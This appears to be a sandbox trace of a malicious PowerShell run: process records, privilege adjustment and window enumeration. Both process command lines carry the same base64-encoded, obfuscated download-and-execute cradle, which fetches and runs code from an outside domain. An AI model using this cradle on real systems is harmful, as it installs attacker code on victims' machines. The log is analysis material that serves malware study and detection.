	id = 632
	os_tid = 0x1380


Thread:
	id = 644
	os_tid = 0x1440


Thread:
	id = 2059
	os_tid = 0x660


Thread:
	id = 2061
	os_tid = 0x1fe8


Thread:
	id = 2062
	os_tid = 0x8b4


Thread:
	id = 2096
	os_tid = 0x1dd0


Process:
	id = "116"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6253f000"
	os_pid = "0xdac"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 597
	os_tid = 0xdb0


Thread:
	id = 630
	os_tid = 0xd04


Thread:
	id = 643
	os_tid = 0x143c


Process:
	id = "117"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6114c000"
	os_pid = "0xdfc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 602
	os_tid = 0xdc8

	[0570.290] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0576.491] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0576.492] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0576.492] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0576.492] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0597.392] GetVersionExW (in: lpVersionInformation=0xcdb60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdb60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0597.394] GetVersionExW (in: lpVersionInformation=0xcdb60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdb60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0597.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0598.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0598.381] GetVersionExW (in: lpVersionInformation=0xcd8d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd8d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0598.381] SetErrorMode (uMode=0x1) returned 0x1
	[0598.383] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcda30 | out: lpFileInformation=0xcda30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0598.384] SetErrorMode (uMode=0x1) returned 0x1
	[0598.387] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdca0 | out: lpdwHandle=0xcdca0) returned 0x94c
	[0598.390] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c472d8 | out: lpData=0x2c472d8) returned 1
	[0598.392] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdc18, puLen=0xcdc10 | out: lplpBuffer=0xcdc18*=0x2c47374, puLen=0xcdc10) returned 1
	[0598.395] lstrlenW (lpString="䅁") returned 1
	[0598.405] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2c47450, puLen=0xcdb80) returned 1
	[0598.406] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0598.408] CoTaskMemAlloc (cb=0x2e) returned 0x28d7c0
	[0598.408] lstrcpyW (in: lpString1=0x28d7c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0598.409] CoTaskMemFree (pv=0x28d7c0) 
	[0598.409] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2c474a4, puLen=0xcdb80) returned 1
	[0598.409] lstrlenW (lpString="System.Management.Automation") returned 28
	[0598.409] CoTaskMemAlloc (cb=0x3c) returned 0x1c9860
	[0598.409] lstrcpyW (in: lpString1=0x1c9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0598.409] CoTaskMemFree (pv=0x1c9860) 
	[0598.409] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2c47500, puLen=0xcdb80) returned 1
	[0598.410] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0598.410] CoTaskMemAlloc (cb=0x20) returned 0x28ddc0
	[0598.410] lstrcpyW (in: lpString1=0x28ddc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0598.410] CoTaskMemFree (pv=0x28ddc0) 
	[0598.410] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2c47540, puLen=0xcdb80) returned 1
	[0598.410] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0598.410] CoTaskMemAlloc (cb=0x44) returned 0x1c9860
	[0598.410] lstrcpyW (in: lpString1=0x1c9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0598.410] CoTaskMemFree (pv=0x1c9860) 
	[0598.410] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2c475a8, puLen=0xcdb80) returned 1
	[0598.410] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0598.410] CoTaskMemAlloc (cb=0x76) returned 0x235ab0
	[0598.410] lstrcpyW (in: lpString1=0x235ab0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0598.410] CoTaskMemFree (pv=0x235ab0) 
	[0598.410] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2c47644, puLen=0xcdb80) returned 1
	[0598.410] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0598.410] CoTaskMemAlloc (cb=0x44) returned 0x1c9860
	[0598.410] lstrcpyW (in: lpString1=0x1c9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0598.410] CoTaskMemFree (pv=0x1c9860) 
	[0598.410] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2c476a8, puLen=0xcdb80) returned 1
	[0598.410] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0598.410] CoTaskMemAlloc (cb=0x58) returned 0x1e9f10
	[0598.410] lstrcpyW (in: lpString1=0x1e9f10, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0598.410] CoTaskMemFree (pv=0x1e9f10) 
	[0598.410] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2c47724, puLen=0xcdb80) returned 1
	[0598.410] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0598.410] CoTaskMemAlloc (cb=0x20) returned 0x28ddc0
	[0598.410] lstrcpyW (in: lpString1=0x28ddc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0598.411] CoTaskMemFree (pv=0x28ddc0) 
	[0598.411] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2c473cc, puLen=0xcdb80) returned 1
	[0598.411] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0598.411] CoTaskMemAlloc (cb=0x66) returned 0x1fb850
	[0598.411] lstrcpyW (in: lpString1=0x1fb850, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0598.411] CoTaskMemFree (pv=0x1fb850) 
	[0598.411] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x0, puLen=0xcdb80) returned 0
	[0598.411] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x0, puLen=0xcdb80) returned 0
	[0598.411] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x0, puLen=0xcdb80) returned 0
	[0598.411] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdb58, puLen=0xcdb50 | out: lplpBuffer=0xcdb58*=0x2c47374, puLen=0xcdb50) returned 1
	[0598.412] CoTaskMemAlloc (cb=0x204) returned 0x22e870
	[0598.412] VerLanguageNameW (in: wLang=0x0, szLang=0x22e870, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0599.731] CoTaskMemFree (pv=0x22e870) 
	[0599.731] VerQueryValueW (in: pBlock=0x2c472d8, lpSubBlock="\\", lplpBuffer=0xcdba8, puLen=0xcdba0 | out: lplpBuffer=0xcdba8*=0x2c47300, puLen=0xcdba0) returned 1
	[0599.737] GetCurrentProcessId () returned 0xdfc
	[0599.754] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xccad0 | out: lpLuid=0xccad0*(LowPart=0x14, HighPart=0)) returned 1
	[0599.757] GetCurrentProcess () returned 0xffffffffffffffff
	[0599.758] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xccaf0 | out: TokenHandle=0xccaf0*=0x19c) returned 1
	[0599.759] AdjustTokenPrivileges (in: TokenHandle=0x19c, DisableAllPrivileges=0, NewState=0x2c4ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0599.761] CloseHandle (hObject=0x19c) returned 1
	[0599.765] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdfc) returned 0x19c
	[0601.217] EnumProcessModules (in: hProcess=0x19c, lphModule=0x2c4abb8, cb=0x200, lpcbNeeded=0xcdb08 | out: lphModule=0x2c4abb8, lpcbNeeded=0xcdb08) returned 1
	[0601.223] GetModuleInformation (in: hProcess=0x19c, hModule=0x13f370000, lpmodinfo=0x2c4ae28, cb=0x18 | out: lpmodinfo=0x2c4ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0601.224] CoTaskMemAlloc (cb=0x804) returned 0x2959a0
	[0601.224] GetModuleBaseNameW (in: hProcess=0x19c, hModule=0x13f370000, lpBaseName=0x2959a0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0601.224] CoTaskMemFree (pv=0x2959a0) 
	[0601.225] CoTaskMemAlloc (cb=0x804) returned 0x2959a0
	[0601.225] GetModuleFileNameExW (in: hProcess=0x19c, hModule=0x13f370000, lpFilename=0x2959a0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0601.225] CoTaskMemFree (pv=0x2959a0) 
	[0601.226] CloseHandle (hObject=0x19c) returned 1
	[0601.350] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xdfc) returned 0x19c
	[0601.351] GetExitCodeProcess (in: hProcess=0x19c, lpExitCode=0xcdc38 | out: lpExitCode=0xcdc38*=0x103) returned 1
	[0601.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c4b088, Length=0x20000, ResultLength=0xcdc00 | out: SystemInformation=0x12c4b088, ResultLength=0xcdc00*=0x35e38) returned 0xc0000004
	[0602.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c6b0b8, Length=0x38638, ResultLength=0xcdc00 | out: SystemInformation=0x12c6b0b8, ResultLength=0xcdc00*=0x35f00) returned 0x0
	[0602.836] EnumWindows (lpEnumFunc=0x2ac66ac, lParam=0x0) returned 1
	[0608.711] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0609.267] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x558
	[0609.270] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0609.276] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0609.277] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0610.713] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x538
	[0610.716] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0610.718] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x778
	[0610.719] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x778
	[0610.720] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0611.573] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0612.851] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.950] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.950] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.950] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.950] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.950] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.950] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x460
	[0613.950] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.950] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.950] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x3a8
	[0613.950] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1bd0
	[0613.951] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1bfc
	[0613.951] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1a78
	[0613.951] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1b90
	[0613.951] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1b04
	[0613.951] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1b34
	[0613.951] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1b64
	[0613.951] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1bb0
	[0613.951] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1acc
	[0613.951] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1a2c
	[0613.951] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x19a8
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1944
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x18c8
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x18ac
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x18ec
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1898
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc98
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x153c
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1808
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x12a4
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1740
	[0613.952] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x16c4
	[0613.953] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1820
	[0613.953] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x16ac
	[0613.953] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1858
	[0613.953] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1664
	[0613.953] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x10b4
	[0613.953] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x10ac
	[0613.953] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x10ec
	[0613.953] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1068
	[0613.953] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x17e0
	[0613.953] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x102c
	[0613.954] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x17a4
	[0613.954] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1050
	[0613.954] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1694
	[0613.954] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1770
	[0613.954] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1720
	[0613.954] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x165c
	[0613.954] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1578
	[0613.954] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x16c0
	[0613.954] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x161c
	[0613.954] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1638
	[0613.955] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x15c8
	[0613.955] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1554
	[0613.955] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1674
	[0613.955] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1520
	[0613.955] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x14bc
	[0613.955] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf8c
	[0613.955] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe9c
	[0613.955] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1434
